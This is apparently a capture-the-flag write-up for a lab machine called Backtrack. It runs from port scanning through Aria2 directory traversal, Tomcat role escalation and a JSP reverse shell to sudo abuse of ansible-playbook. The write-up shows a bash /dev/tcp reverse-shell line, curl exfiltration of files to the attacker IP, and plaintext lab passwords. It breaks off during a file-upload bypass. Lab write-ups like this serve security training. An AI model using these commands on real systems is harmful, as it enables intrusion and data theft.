The following post by anthonyjsaab is licensed under
0 - Introduction
1 - Port Scans
1a - Discovery
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -T4 -p- backtrack.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 06:57 EEST
Nmap scan report for backtrack.thm (10.10.237.46)
Host is up (0.100s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
6800/tcp open unknown
8080/tcp open http-proxy
8888/tcp open sun-answerbook
Nmap done: 1 IP address (1 host up) scanned in 250.16 seconds
1b - Versions and OS
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -A -p22,6800,8080,8888 backtrack.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 07:02 EEST
Nmap scan report for backtrack.thm (10.10.237.46)
Host is up (0.095s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 55:41:5a:65:e3:d8:c2:4f:59:a1:68:b6:79:8a:e3:fb (RSA)
| 256 79:8a:12:64:cc:5c:d2:b7:38:dd:4f:07:76:4f:92:e2 (ECDSA)
|_ 256 ce:e2:28:01:5f:0f:6a:77:df:1e:0a:79:df:9a:54:47 (ED25519)
6800/tcp open http aria2 downloader JSON-RPC
|_http-title: Site doesn't have a title.
8080/tcp open http Apache Tomcat 8.5.93
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.93
8888/tcp open sun-answerbook?
| fingerprint-strings:
| GetRequest, HTTPOptions:
| HTTP/1.1 200 OK
| Content-Type: text/html
| Date: Sat, 12 Oct 2024 04:02:31 GMT
| Connection: close
| <!doctype html>
| <html>
| <!-- {{{ head -->
| <head>
| <link rel="icon" href="../favicon.ico" />
| <meta charset="utf-8">
| <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <meta name="theme-color" content="#0A8476">
| <title ng-bind="$root.pageTitle">Aria2 WebUI</title>
| <link rel="stylesheet" type="text/css" href="https://fonts.googleapis.com/css?family=Lato:400,700">
| <link href="app.css" rel="stylesheet"><script type="text/javascript" src="vendor.js"></script><script type="text/javascript" src="app.js"></script></head>
| <!-- }}} -->
| <body ng-controller="MainCtrl" ng-cloak>
| <!-- {{{ Icons -->
|_ <svg aria-hidden="true" style="position: absolute; width: 0; height: 0; overflow: hidden;" version="1.1" xm
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8888-TCP:V=7.94SVN%I=7%D=10/12%Time=6709F4D8%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,13F0,"HTTP/1\.1\x20200\x20OK\r\nContent-Type:\x20text/html
--SNIP--
SF:olute;\x20width:\x200;\x20height:\x200;\x20overflow:\x20hidden;\"\x20ve
SF:rsion=\"1\.1\"\x20xm");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 8888/tcp)
HOP RTT ADDRESS
1 97.57 ms 10.11.0.1
2 95.60 ms backtrack.thm (10.10.237.46)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.03 seconds
2 - Aria2 WebUI
2a - Finding the vuln
The HTTP server on port 8888 returns a WebUI called Aria2 WebUI. Quickly searching for a vuln on Google:
2b - Directory Traversal
After clearing the cache on the browser, proxying all requests to Burp and holding the requests for a while without forwarding, we can see how the WebUI behaves and what it sends without having to go through the code. We intercept multiple requests without interacting with the browser, but this is the one we are interested in:
Amazing! This is a great way to look inside the targets files.
2c - Gathering sensitive info
Trying to brute-force some well-known files using Intruder crashes the Aria server. We have to access files manually in order not to overwhelm and crash the server.
There are 4 accounts that can be considered human based on their ids: root, tomcat, orville and wilbur
We cannot login using tomcat through ssh (/bin/false)
We collected a password from a well-known configuration file for tomcat
The server on port 8888 runs with privileges of the tomcat user
3 - Foothold
3a - Dead-ends
id_rsa
Trying to collect the private key of the users (except tomcat) did not yield anything
authorized_keys
Trying to authorize my own key by writing to the respective .ssh folders did not work because of a lack of adequate permissions for the tomcat user:
3b - Tomcat, help!
The tomcat admin credentials we got were great, but the user in question has no useful privileges. This is because its role is only 'manager-script'.
We have to find a way to elevate this tomcat user. This can be done only by editing the /opt/tomcat/conf/tomcat-users.xml file. But how can we do that?
Well, since we already know that the server on port 8888 has the Linux 'tomcat' user's privileges, the server can probably overwrite tomcat-users.xml by downloading a new one!
I will host the following file on my machine, where the roles are significantly higher:
If you look closely at the /manager/html panel above, you will notice a path called /reverse_shell!
Requesting it gives us the following:
I am not sure what is happening here, but it is not worth investigating. I do have enough privileges to upload a shell of my own. I will be using a webshell that is bundled in /usr/share/webshells/jsp/jsp-reverse.jsp.
โโโ(kaliใฟkali)-[~/public_folder]
โโ$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.164.14] 38942
id
uid=1002(tomcat) gid=1002(tomcat) groups=1002(tomcat)
python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@Backtrack:~$ ls -la /opt/tomcat/flag1.txt
ls -la /opt/tomcat/flag1.txt
-rw-r--r-- 1 tomcat tomcat 38 Mar 9 2024 /opt/tomcat/flag1.txt
tomcat@Backtrack:/tmp$ cat ./tomcat-enum.txt | base64 > tomcat-enum.txt.b64
cat ./tomcat-enum.txt | base64 > tomcat-enum.txt.b64
tomcat@Backtrack:/tmp$ curl -X POST --data-binary @tomcat-enum.txt.b64 http://10.11.85.12:90
<a-binary @tomcat-enum.txt.b64 http://10.11.85.12:90
curl: (1) Received HTTP/0.9 when not allowed
tomcat@Backtrack:/tmp$
Receiving and decoding output
โโโ(kaliใฟkali)-[~/public_folder]
โโ$ nc -lvnp 90 > tomcat-enum.txt.b64
listening on [any] 90 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.156.152] 40854
โโโ(kaliใฟkali)-[~/public_folder]
โโ$ # removed HTTP headers from response, kept body
โโโ(kaliใฟkali)-[~/public_folder]
โโ$ nano tomcat-enum.txt.b64
โโโ(kaliใฟkali)-[~/public_folder]
โโ$ dos2unix tomcat-enum.txt.b64
dos2unix: converting file tomcat-enum.txt.b64 to Unix format...
โโโ(kaliใฟkali)-[~/public_folder]
โโ$ cat tomcat-enum.txt.b64 | base64 -d > tomcat-enum.txt
Here is the LinPEAS output:
4b - Wilbur
The following lead presented itself before I even ran LinPEAS:
tomcat@Backtrack:/$ sudo -l
sudo -l
Matching Defaults entries for tomcat on Backtrack:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tomcat may run the following commands on Backtrack:
(wilbur) NOPASSWD: /usr/bin/ansible-playbook /opt/test_playbooks/*.yml
The wildcard above gives us great freedom! We can backtrack to a directory where we have stored a revshell command in a custom yml file:
tomcat@Backtrack:/tmp$ cat rev.yml
- hosts: localhost
tasks:
- name: rev
shell: bash -c 'bash -i >& /dev/tcp/10.11.85.12/9003 0>&1'
tomcat@Backtrack:/tmp$ sudo -u wilbur /usr/bin/ansible-playbook /opt/test_playbooks/../../../tmp/rev.yml
[WARNING]: provided hosts list is empty, only localhost is available. Note that
the implicit localhost does not match 'all'
--SNIP--
[WARNING]: Skipping plugin (/usr/lib/python3/dist-
packages/ansible/plugins/callback/sumologic.py) as it seems to be invalid:
module 'lib' has no attribute 'X509_V_FLAG_NOTIFY_POLICY'
PLAY [localhost] ***************************************************************
TASK [Gathering Facts] *********************************************************
ok: [localhost]
TASK [rev] *********************************************************************
โโโ(kaliใฟkali)-[~/public_folder]
โโ$ nc -lvnp 9003
listening on [any] 9003 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.238.90] 33938
wilbur@Backtrack:/tmp$ id
id
uid=1004(wilbur) gid=1004(wilbur) groups=1004(wilbur)
wilbur@Backtrack:/tmp$ cd ~
wilbur@Backtrack:~$ ls -la
total 36
drwxrwx--- 5 wilbur wilbur 4096 Oct 13 07:34 .
drwxr-xr-x 4 root root 4096 Mar 9 2024 ..
drwxrwxr-x 3 wilbur wilbur 4096 Oct 13 07:22 .ansible
lrwxrwxrwx 1 root root 9 Mar 9 2024 .bash_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 3771 Mar 9 2024 .bashrc
drwx------ 2 wilbur wilbur 4096 Oct 13 07:34 .cache
drwx------ 3 wilbur wilbur 4096 Oct 13 07:28 .gnupg
-rw------- 1 wilbur wilbur 48 Mar 9 2024 .just_in_case.txt
lrwxrwxrwx 1 root root 9 Mar 9 2024 .mysql_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 1010 Mar 9 2024 .profile
-rw------- 1 wilbur wilbur 461 Mar 9 2024 from_orville.txt
wilbur@Backtrack:~$ cat .just_in_case.txt
in case i forget :
wilbur:mYe317Tb9qTNrWFND7KF
4c - Orville
Something promising appeared in the LinPEAS output, even before we moved to wilbur:
With socat listening and proxying on the target machine, I am able to do this:
The website does not give us much wiggle room to try and exploit it from the browser. And it seemed like a dead-end. At least when I was tomcat. But now that I am wilbur, I had access to a very important file:
wilbur@Backtrack:~$ pwd
pwd
/home/wilbur
wilbur@Backtrack:~$ ls -la
ls -la
total 28
drwxrwx--- 3 wilbur wilbur 4096 Oct 13 03:57 .
drwxr-xr-x 4 root root 4096 Mar 9 2024 ..
drwxrwxr-x 3 wilbur wilbur 4096 Oct 13 03:57 .ansible
lrwxrwxrwx 1 root root 9 Mar 9 2024 .bash_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 3771 Mar 9 2024 .bashrc
-rw------- 1 wilbur wilbur 48 Mar 9 2024 .just_in_case.txt
lrwxrwxrwx 1 root root 9 Mar 9 2024 .mysql_history -> /dev/null
-rw-r--r-- 1 wilbur wilbur 1010 Mar 9 2024 .profile
-rw------- 1 wilbur wilbur 461 Mar 9 2024 from_orville.txt
wilbur@Backtrack:~$ cat fr*
cat fr*
Hey Wilbur, it's Orville. I just finished developing the image gallery web app I told you about last week, and it works just fine. However, I'd like you to test it yourself to see if everything works and secure.
I've started the app locally so you can access it from here. I've disabled registrations for now because it's still in the testing phase. Here are the credentials you can use to log in:
email : orville@backtrack.thm
password : W34r3B3773r73nP3x3l$
wilbur@Backtrack:~$
This was the missing puzzle piece! Now I can login and proceed:
We can see that there are no images yet. Let us upload as image of our own and see what happens.
Now the question is: can we upload a shell? I will try to upload my favorite PHP webshell:
We have to bypass these filters:
Apache/2.4.41 does not have a known directory traversal published, so storing it somewhere on the filesystem using wilbur and trying to access it through Apache won't work
/var/www/html is not accessible using any of the users we compromised
We can however try to add some backtraces to the filename:
Using a simple backtrace will store the file in uploads/. So it fails. We have to use Intruder to try and store it anywhere above uploads/ (ideally just above it). To do that, we will use a famous repo's wordlist:
5 - ROOT
Created by , , and
However, trying to go to just downloads the file! But we see that in the root directory (above uploads/), where login.php and dashboard.php are stored, the PHP files are rendered instead of sent as is. Dead ends:
